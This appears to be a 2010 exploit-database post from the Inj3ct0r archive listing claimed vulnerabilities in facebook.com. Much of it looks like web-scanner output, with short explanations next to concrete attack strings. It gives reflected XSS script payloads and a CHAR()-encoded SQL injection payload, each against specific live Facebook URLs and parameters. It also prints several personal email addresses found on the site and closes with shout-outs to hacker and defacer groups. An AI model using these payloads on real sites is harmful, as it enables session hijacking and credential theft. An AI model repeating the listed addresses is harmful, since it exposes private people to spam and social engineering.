=============================
allow vurnerable facebook.com
=============================


 mc2_s3lector
[+]yogyacarderlink.web.id
[+]KeDaicomputerworks.org (makassar)
[+][2010-04-06]

----------------------------------------------------------------------------------------------------
facebook german
----------------------------------------------------------------------------------------------------
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script 
(Javascript,VbScript) in the context of the application. This allows several 
different attack opportunities, mostly hijacking the current session of the 
user or changing the look of the page by changing the HTML on the fly to steal 
the user's credentials. This happens because the input entered by a user has 
been interpreted as HTML/Javascript/VbScript by the browser. XSS targets the 
users of the application instead of the server. Although this is a limitation, 
since it allows attackers to hijack other users' session, an attacker might 
attack an administrator to gain full control over the application.

[Report]

Name      : Query Based 
Parameter :Type: FullQueryString 
Attack 	  :'"--><script>alert(0x000498)</script> 

http://www.facebook.com/terms/provisions/german?'"--><script>alert(0x000498)</script>
------------------------------------------------------------------------------------------------------
MITM attack 1
------------------------------------------------------------------------------------------------------
This cookie will be transmitted over a HTTP connection, therefore if this cookie 
is important (such as a session cookie) an attacker might intercept it and hijack 
a victim's session. If the attacker can carry out a MITM attack, he/she can force 
victim to make a HTTP request to steal the cookie. 

[Report]
Cookie: reg_fb_ref 
Name: nsextt 
Type: Querystring 
Attack Pattern: '"--><script>mc2_s3lector(0x001F66)</script> 

https://login.facebook.com/alogin.php?gray=2&hash=95369428d067a9db6a3104d54c6b0187&oid=121759744510721
------------------------------------------------------------------------------------------------------
Xss
------------------------------------------------------------------------------------------------------
XSS targets the users of the application instead of the server. Although this is a limitation, since it 
allows attackers to hijack other users' session, an attacker might attack an administrator to gain full 
control over the application. 

Due to content-type of the response exploitation of this vulnerability might not be possible in all 
browsers or might not be possible at all. Content-type indicates that there is a possibility of
 exploitation by changing the attack however does not support confirming these issues. 
You need to manually confirm this problem. Generally lack of filtering in the response can cause
Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer. 

Vulnerable :  http://www.facebook.com/contact_importer/ajax/importer.php  

Name   : ms_login_name 
Type   : Post 
Attack : %27%22%20ns=mc2_s3lector(0x001069)%20 

------------------------------------------------------------------------------------------------------- 
MITM 2
-------------------------------------------------------------------------------------------------------
If an attacker can carry out a MITM (Man in the middle) attack, he/she may be able to intercept traffic 
by injecting JavaScript code into this page or changing action of the HTTP code to steal the users 
password. Even though the target page is HTTPS, this does not protect the system against MITM attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.

[report]
Vulnerable :  http://www.facebook.com/ajax/  
action     : https://login.facebook.com/login.php?login_attempt=1 

-------------------------------------------------------------------------------------------------------
identified that password data is sent over HTTP
-------------------------------------------------------------------------------------------------------
-identified that password data is sent over HTTP. 
-If an attacker can intercept network traffic he/she can steal users credentials.

Vulnerable  :  http://www.facebook.com//find-friends/?ref=pf  
               http://www.facebook.com//find-friends/?ref=pf
action      :  http://www.facebook.com/contact_importer/ajax/importer.php 
               http://www.facebook.com/contact_importer/ajax/importer.php 

-------------------------------------------------------------------------------------------------------
internal server
-------------------------------------------------------------------------------------------------------
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons 
may vary. The behavior should be analysed carefully. is able to find a security issue in 
the same resource it will report this as a separate vulnerability

[report]

Vulnerable URL :  http://www.facebook.com/ajax/signup_dialog.php?page_id=(select                   CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)
                  +CHAR(109)+CHAR(97))&next=/fbsitegovernance/posts/120701477944064  
Name   : page_id 
Type   : Querystring 
Attack :(select+CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR
        (101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)) 
-------------------------------------------------------------------------------------------------------
pass
-------------------------------------------------------------------------------------------------------

- Data entered in these fields will be cached by the browser. An attacker who can access the victim's 
  browser could steal this information. This is especially important if the application is commonly used 
  in shared computers such as cyber cafes or airport terminals. 
- Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or 
  important fields such as "Credit   Card".etc

[report]

Vulnerable  http://www.facebook.com///error.facebook.com//common//scribe_endpoint.php?c=si_
                 clickjacking&m&t=4778  

            http://www.facebook.com/window.location.href'  
            http://www.facebook.com///b.static.ak.fbcdn.net//rsrc.php 


-----------------------------------------------------------------------------------------------------------
Email address disclousure
-----------------------------------------------------------------------------------------------------------
E-mail addresses discovered within the application can be used by both spam email engines and also 
brute force tools. Furthermore valid email addresses may lead to social engineering attacks . 

[report]

                  http://www.facebook.com/pages/explotar-burbujitas-de-plastico/31118267838  
Vulnerable URL :  http://www.facebook.com//find-friends/?ref=pf 
               :  http://www.facebook.com/legal/copyright.php?howto_report 
		  http://www.facebook.com/pages/I-need-a-vacation/72161599412
		  http://www.facebook.com/pages/Hot-Showers/88216396646 
                  ---->example found :und E-mails: ip@facebook.com, weezyFOW@gmail.com, droopy_cf@live.com.ar 
                                     :TE@WWW.VACATIONSUNSATION.GL, frajbargaoui@gmail.com
-------------------------------------------------------------------------------------------------------------

big thank to:- inj3ct0r.com ( Inj3ct0r Exploit Database by r0073r )
	     - yogyacarderlink.web.id(v3n0m,lingga,z0mb13,my wisdom, setan muda, byebye,m4rc0,leqi,crackbox,&all 
             - my family KeDai computerworks.com(fanzy kobandaha,hendry slank,mas william,wahdan,wandi rifaldi&All
             - the-codec stuff 0n3-d4y,hendry_slank,4m-007,red naruto,cooln3tter
             - jasakom.com
             - indonesian hacker
             - indonesiandefacer
             - indonesian like a coding 
             - STMIK dipanegara makassar




# Inj3ct0r.com <http://inj3ct0r.com/> [2010-05-15]